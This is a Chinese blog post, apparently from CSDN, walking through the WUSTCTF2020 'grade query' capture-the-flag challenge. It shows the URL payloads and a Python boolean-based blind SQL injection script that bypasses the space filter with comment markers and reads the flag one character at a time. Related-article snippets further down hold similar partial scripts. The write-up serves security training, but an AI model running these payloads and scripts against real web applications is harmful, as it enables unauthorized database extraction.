[WUSTCTF2020]颜值成绩查询 布尔盲注

最新推荐文章于 2024-06-13 14:29:56 发布
最新推荐文章于 2024-06-13 14:29:56 发布
阅读量262 收藏
点赞数
分类专栏: sql注入 文章标签: ctf sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37301470/article/details/121685685
版权

[WUSTCTF2020]颜值成绩查询

只有一个输入框,是sql注入题目
尝试输入1,2,3
可以发现是get方法提交的参数且是数字型
故用hackbar

/?stunum=1 or 1=2 %23

student number not exists.

刚刚还可以查到现在查不到了判断存在过滤
尝试下发现是空格

上盲注脚本

import string

import requests
select=f"select/**/value/**/from/**/flag"
ans=""
for i in range(1,100):
    for ascii in range(32,128):
        url = f"http://adad8be9-a1e6-4d5b-9bd5-6dc612e1db73.node4.buuoj.cn:81/?stunum=1^(ascii(substr(({select}),{i},1))={ascii})^1"
        print(url)
        print(ans)
        res=requests.get(url)

        if "Hi admin, your score is: 100" in res.text:
            ans+=chr(ascii)
            break
        if ascii ==127:
            exit(0)
捞氘河水怪
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[WUSTCTF2020]颜值成绩查询 1
qq_51553814的博客
08-22 634
[WUSTCTF2020]颜值成绩查询 1 解题 就是一个布尔,尝试自己写了一下python脚本,磕磕绊绊最后还是写出来了 主要是学了一个二分法,理解了一下 import requests url="http://f8aed0d0-ab96-4a36-8022-2a70701fe282.node4.buuoj.cn:81/?stunum=" name='' for i in range(1,100): print(i) low=32 high=128 mid=(lo
SQL入之基于布尔详解
09-10
首先说明的入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL入。一般分为布尔和基于时间的。这篇文章主要讲解的是基于布尔。下面来一起看看吧。
[WUSTCTF2020]颜值成绩查询 --不会编程的崽
不会编程的崽的博客
03-17 849
sql
[WUSTCTF2020]颜值成绩查询
K1ose的博客
03-11 231
访问页面; 分别输入1,2,3,4,为4个不同的结果,根据提示猜测应该是SQL入; 在测试了各种类型的入后,锁定为布尔入; 首先输入 if(length(database()>1,1,0) 输出了stunum=1的结果; 当输入 if(length(database()>10,1,0) 则输出了stunum=0的结果; 这样我们就可以写脚本; import requests import time flag = "" for i in range(1, 100): low =
[WUSTCTF2020]颜值成绩查询布尔入)
记录学习,一起进步
01-27 753
[WUSTCTF2020]颜值成绩查询布尔入)
[WUSTCTF2020]颜值成绩
shinygod的博客
04-09 414
知识点:布尔 当我们输入1,2,3,4的时候都有回显,但是当输入5的时候会回显 判断布尔,测试一波 这种显示不存在 1'and length(database()) >1# 当用异或入的时候显示正确1^1^1,并回显Hi admin,这样我们就可以由此来。 import re import requests import string url = "http://ebb62726-0fba-430e-bf27-5e7214c31577.node4.buuoj.cn:81/" f
buuctf-[WUSTCTF2020]颜值成绩查询
2202_75317918的博客
10-01 454
当输入的学号不存在时,只会返回“student number not exists.”。猜测是题,因为看不见其他的回显信息,初步想法是构造值为1或0的表达式来进行探测。发现功能就是输入一个学号,然后返回对应的成绩,就是一个简单的查询操作。如果不采用二分法,会跑的很慢。打开环境,随便输个1看看。
布尔python脚本.zip
12-28
GET和POST型python脚本
布尔python3范本模板
01-16
布尔python3范本模板
布尔.py_sqlpython_
10-03
一个简单的sql的python脚本,其中语句需要根据环境条件做改变
布尔python脚本
04-22
.py文件,python脚本实现布尔,输入网址实现自动化入,信息包括数据库名、表名、字段以及字段中数据。 代码示例靶场:sqli_labs第八关实测可行 意事项:python3.8,就用了一个requests第三方库,单线程实现...
【大数据】Spark使用大全:下载安装、RDD操作、JAVA编程、SQL
最新发布
Joker_ZJN的博客
06-13 1080
一文详解Spark的使用
布尔 python
12-22
布尔是一种常见的网络安全攻击技术,利用用户输入的漏洞来修改数据库查询,从而实现非法访问或者窃取敏感信息。而 Python 是一种强大的编程语言,广泛应用于网络开发领域。 在 Python 中,由于开发者处理用户...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值